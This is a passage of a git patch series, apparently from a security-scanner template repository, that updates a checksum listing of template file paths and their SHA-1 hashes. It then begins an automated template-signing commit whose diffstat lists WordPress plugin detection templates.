+http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:f9588fa560d179dfc756e86e124f3de9fd7818d0 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:a87f55019e3968246821d97c55446b690c1de086 -http/technologies/wordpress/plugins/mailpoet.yaml:6bfbff4e3370a7ccba832f671b3021bf25dcd692 -http/technologies/wordpress/plugins/maintenance.yaml:df616ce4973e59829c9bf1c0cfc4547d4fabcc67 -http/technologies/wordpress/plugins/mainwp-child.yaml:f8d59ec445720b8b2ed9336618f0a32a21713729 -http/technologies/wordpress/plugins/malcare-security.yaml:05aeb2d0567d75c212d68d167779fe4876ef0213 -http/technologies/wordpress/plugins/megamenu.yaml:c97dbfdb3272f4deda1b774af1f0a834bea834d1 -http/technologies/wordpress/plugins/members.yaml:332428240b54c23636714d4f19882c5f185e74e3 -http/technologies/wordpress/plugins/meta-box.yaml:7421eaa26219245e95f790a9b59e9f567a9c0abe -http/technologies/wordpress/plugins/metform.yaml:5801235432731d5c40a6298edcfc2a4578d4db0c -http/technologies/wordpress/plugins/ml-slider.yaml:5257d47fbb601c7e495cdab2f6a865557d0da750 -http/technologies/wordpress/plugins/newsletter.yaml:1097162a364d30418b264e712390622e05064955 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:589b415afc849aa8a10d62b4a67292035b0dff6c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:75e981a3bff621e4ac70f59f88814eca344fb7b4 -http/technologies/wordpress/plugins/ninja-forms.yaml:47d5949da0bb6354fd338bae835b1783da496bcc -http/technologies/wordpress/plugins/ocean-extra.yaml:8d07b1d31f20b6d8a7028afa18aa8950b4543d22 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:97b32243c2ee40f156e35f7bade8825d0aa89956 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:0f4ee43051a8c5890b5e82b934e90b6765097dd5 -http/technologies/wordpress/plugins/optinmonster.yaml:e7441353ff2d493669ac9af820f32b9a2ae57f72 -http/technologies/wordpress/plugins/otter-blocks.yaml:439bb8d01b461c245a11e0acc653cf5c47c603c2 -http/technologies/wordpress/plugins/password-protected.yaml:df263a62ef64f6ed364c5ea760a0df1e2a94cba8 -http/technologies/wordpress/plugins/pdf-embedder.yaml:4c3e3ee8c3e28ff5075da9283679105a79539120 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:6835d57a15a1cda939f9bbb35bdf5285bd7b6420 -http/technologies/wordpress/plugins/pixelyoursite.yaml:0ad980770614f80e1375fddcd808e1e0e16d16a7 -http/technologies/wordpress/plugins/polylang.yaml:17cecffe3c82c2eecd6a037b51f59bb264942919 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:5642fd51078378fd9e1d8d874d68715080b02abe -http/technologies/wordpress/plugins/post-smtp.yaml:af572c6967199c4e746d00d606204e2ae9dbde42 -http/technologies/wordpress/plugins/post-types-order.yaml:eda9cd69827523c70b53dc14e3406f3f9d7262e0 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:fca2d1bddb39f0cc66eb5e51bac6e31d9267d72d -http/technologies/wordpress/plugins/pretty-link.yaml:258573c4adfe0e49e4f31699044c511c8bbed4ab -http/technologies/wordpress/plugins/really-simple-captcha.yaml:278a29a8894e3ba2c4fce719abd636e80b0cdab1 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:eef1607167c4032fd74a7084cc41c18622e118fb -http/technologies/wordpress/plugins/redirection.yaml:2b289f8070bda189f0a387415806062b97ab44dc -http/technologies/wordpress/plugins/redux-framework.yaml:b130f6ec54cd31ecf95d6b5fe389e46b74c15d1c -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:114a8cc54ea486fecf5c32cacde57bd50126c662 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:3360c1cbf93487ed9cf2e70ff624cff545da179f -http/technologies/wordpress/plugins/safe-svg.yaml:cfe582df4296d260a016de80d174499bb2c2f4ff -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:ce778f5589a32d09c7e7ed6cfd5e9affa8ebb23c -http/technologies/wordpress/plugins/sg-cachepress.yaml:ae604a08fdccb23c1be705d0702e58686ca43e9f -http/technologies/wordpress/plugins/sg-security.yaml:15634c874778d46ebf2822adc51fe720a2c2fe61 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2555ae733247621a236f833c55ad7732b2fe583b -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:16fcba2f30aa0dfacbd69677083c28986af902fd -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:424188c048abcac8cad5bdf5d5475a83a934631e -http/technologies/wordpress/plugins/simple-history.yaml:acff44d8766510332d2c15985d1cebbb4c916dd9 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:3ddf7d9dff7e228a4e4763f9f3016d7d1facfd5c -http/technologies/wordpress/plugins/siteorigin-panels.yaml:6db9e24300337e341557dfc5a5e1bd05e726525c -http/technologies/wordpress/plugins/smart-slider-3.yaml:f33fe6be8999acbbe1ce9bde266f0a21661951f7 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f50d726aea8506971ddb27744013e0c3515b411f +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:7de928ac65834c785fc7172b38d3889e1fa3c4e2 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:5a5a4a71cc2024d7a8bba6683f71da891afcdbad -http/technologies/wordpress/plugins/sucuri-scanner.yaml:54fbfccef92112734018a5230fa90b87bbc8b51d +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e8f881a4a0cc92391ff54a8ee17f09f391603b19 -http/technologies/wordpress/plugins/tablepress.yaml:c8952b297419c2b58c4b568dd4f2c36a0c891619 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:9e0bd1581c49fa97bfb41a0ae3ac0b9370663f84 -http/technologies/wordpress/plugins/templately.yaml:783fd03a270111eb37ede4ed1c6d6245d8494951 -http/technologies/wordpress/plugins/the-events-calendar.yaml:9cb924235d50d4f97f8d076dad5ff6c14d5acd9e +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:31d98cdbd6431ca69ee565e8e8cad818805d8d57 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:891fbf0aa4518a9c920d2528760532ee55799d90 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:45b14d6bbc801a6440cfa3fe60068fcc2e049d70 -http/technologies/wordpress/plugins/under-construction-page.yaml:ee461a0bb2fc1836629c5b10ac9f6eb9677dbe8d +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:dcf3df8f85d518251af5121f75e1d40a135e1939 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:25d94f3387835b76cdedf368addd5d38ba724daf +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:1dbcc2bc9782df1fe81ce669457b9c3629bc220a -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d23a5e3c39f0d1f416afb19ca9a0ff0c77915462 -http/technologies/wordpress/plugins/webp-express.yaml:6e32d8b2db1ae45ebd1a38c12f955cc479d9ec5a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ed712a71f1e7333426dd32a1590b20ba0e2569ad -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:8bd64e796bfd61c39344c7594f30a6658b22fefb -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:a8702e197c2c2bce7cdd2f51ebb012d3772dac89 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:525fdd6f53bd792c68e776f86d7fb3d6e2372477 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d082a3cc29296544e92ac2459c2086e44dca3f90 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:27e90d05a8c0b324ff486f536fda29176612298f -http/technologies/wordpress/plugins/woocommerce-payments.yaml:a18e42c98e916aecbd48f9503bcd9fe9d2fb9cad -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:94e262546b0b4fa684693072857dfddc62584dfa -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:3dee56a54dc03da2b42358adaf1af4c58be53eb4 -http/technologies/wordpress/plugins/woocommerce-services.yaml:0ca9e92239137e85aba04a5ef79661385c867bea -http/technologies/wordpress/plugins/woocommerce.yaml:002d7802e5c03eb3042c2547a74ac11f4ab569e6 -http/technologies/wordpress/plugins/wordfence.yaml:769b99157ef493462f038f79207ce701d6aa58a5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:f80b75fe076c7d178589f90f73e527413b52ef42 -http/technologies/wordpress/plugins/wordpress-seo.yaml:f262daeb9649ee5e5aa507827b119b3d3cbd587d +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:c3d101e669e54b2c17074c8d1ffe6e6f24046a2c -http/technologies/wordpress/plugins/wp-crontrol.yaml:49056c0c0f18a406e521749aab17eddb44dc5dfb -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:951c76ce450f76cdd777a53ee7128b2f28f58822 -http/technologies/wordpress/plugins/wp-file-manager.yaml:5db5e3012150c12a2ddf4993ca68184c1159514a -http/technologies/wordpress/plugins/wp-google-maps.yaml:6bfc6779ae36ee7639c5a5775c3db24dc234af98 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:e6326300f556b7b9f53688febcc02d54963a56eb -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:0d819c30707115e9d289909133510d853582ad69 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:dc10c8db3b5b573a8bfcb2ce4b74a0ad683a04e2 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:847533f4e2e7fdc78c8f4ec60a580149ae5d5f94 -http/technologies/wordpress/plugins/wp-optimize.yaml:42d66938ef78979fa436c5eb4f6448e016fce5ff -http/technologies/wordpress/plugins/wp-pagenavi.yaml:4b7adea9821723de9a728fff8dd3f984e3a0ed39 -http/technologies/wordpress/plugins/wp-reset.yaml:7a54a4fbdce218d2e74f02c2aa0a3293149bd74b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:f21f4f5451cbecbe48b822acd1bd3af12d25e609 -http/technologies/wordpress/plugins/wp-rollback.yaml:2bfa7c47f5914240a27336266d633a200982bc45 -http/technologies/wordpress/plugins/wp-seopress.yaml:40ec0107cf780403cf8b2bf12b0642520d1ba8d1 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:54e88e5a0947408170723cbeb03dcdddf1374a10 -http/technologies/wordpress/plugins/wp-smushit.yaml:579d054a38752e3566792834d0bf50f749d1ba7f -http/technologies/wordpress/plugins/wp-statistics.yaml:0e6cefaa7a1f5079e47c6a4ce05643181cd906dc -http/technologies/wordpress/plugins/wp-super-cache.yaml:ac08bb7116b946a3543d9eed0fc0d1acee32669a +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:483c05699fccac38549d337f43182108d5235c78 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:5a23b5054d9c2b4da426d9a793b0ba14437b96d6 -http/technologies/wordpress/plugins/wpforms-lite.yaml:1bc3b722bd17f643c42012e4246bc4c8764decac -http/technologies/wordpress/plugins/wps-hide-login.yaml:ea132c51e0ef5ffe0538c6bcca4b1f726a9aa890 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:2262bb52698815f24d609da088bf7f2f438bccc2 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:8902bac50c8aac61f9e6d79a1bdc759582496175 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8155,7 +8155,7 @@ http/vulnerabilities/other/myucms-lfr.yaml:8d0bfa8b8425fdb69817086012b8277d9955b http/vulnerabilities/other/nacos-auth-bypass.yaml:7cf2add98f8b55d98eb770f9ddfd3a908f50f76d http/vulnerabilities/other/natshell-path-traversal.yaml:17f09bec0c96347c08b70e2bd5a9df3be8f50cc9 http/vulnerabilities/other/natshell-rce.yaml:723bf60a0d083578377fa308221b4c1ceaf78b55 -http/vulnerabilities/other/ncast-lfi.yaml:f766ec7da1fe36dc61b566c15300a4da900750c2 +http/vulnerabilities/other/ncast-lfi.yaml:15bd56222d21178d3f2a276603efc9b052c4d91f http/vulnerabilities/other/netgear-router-auth-bypass.yaml:031b548982d19f7685bcc7d9b453e1ba236ac7e4 http/vulnerabilities/other/netgear-router-exposure.yaml:d401cd800f11fdd6c0cf6c556a4b61d7589d78f9 http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml:a82ad04e613b9104f9be98fb4888d8965e9131d3 @@ -8292,7 +8292,7 @@ http/vulnerabilities/other/webigniter-xss.yaml:897ca9f80a8b4290fc37e0483d27b03d4 http/vulnerabilities/other/webpagetest-ssrf.yaml:c21a582fa932655dafc3188b76e0ba1a43f56d82 http/vulnerabilities/other/webui-rce.yaml:c43d198f5c4c62ac685df18ec9a49d44e314bcd8 http/vulnerabilities/other/wems-manager-xss.yaml:acff97542fbfebaf1ba088b7f560c6ca677c9e06 -http/vulnerabilities/other/wifisky7-rce.yaml:bd3dc2c027ff7217419c8a0c94a1e6ae49f8f440 +http/vulnerabilities/other/wifisky7-rce.yaml:295288a14db09eabc4bf06fc9cd67569bc19cb78 http/vulnerabilities/other/wisegiga-nas-lfi.yaml:461884c7d59af3c309718544ea7f33c14b9fe14e http/vulnerabilities/other/wuzhicms-sqli.yaml:e949fbef0ad0e958652d50ca0d66b28834b88e50 http/vulnerabilities/other/xdcms-sqli.yaml:af7a3caae312f5e03b34de5efc46e054519786a7 @@ -8804,7 +8804,7 @@ network/detection/weblogic-t3-detect.yaml:74b2d9812a56e856258d2be39f049c97d1d322 network/detection/wing-ftp-detect.yaml:348ee17259fa914b2616136b6a957d4fb065fad0 network/detection/ws_ftp-ssh-detect.yaml:ed6343cf51322aaa43abcd235f01064e11b76243 network/detection/xlight-ftp-service-detect.yaml:0f71e841dfea0daaa4c5c812b31561f88f010c60 -network/enumeration/beanstalk-service.yaml:23e58a3417399f49be9f3490eb74e5bf27bc3420 +network/enumeration/beanstalk-service.yaml:30e5c70f87c967bfb79a145fc6854896c8d9c09e network/enumeration/kafka-topics-list.yaml:ed82c8cd5749c2e11d2e6bf3dd14d2270371b9c0 network/enumeration/mongodb-info-enum.yaml:d30bc0bc233e5e5f8c50a6c5b7f5eeb9415eb859 network/enumeration/niagara-fox-info-enum.yaml:971dad0b0bd60622a27c34ece193af950e7de0ca @@ -8904,7 +8904,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5e5d65ee2c23b89bb2ea0149089d83b4a4f5ecd1 +templates-checksum.txt:fccf94e56dbbbcdda25c6a0ed41852e629c0f59f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 97ee56fee032efbd17747689d9f2a1b8f07c9e24 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 22 Jul 2024 07:35:42 +0000 Subject: [PATCH 1489/1841] Auto Template Signing [Mon Jul 22 07:35:42 UTC 2024] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + 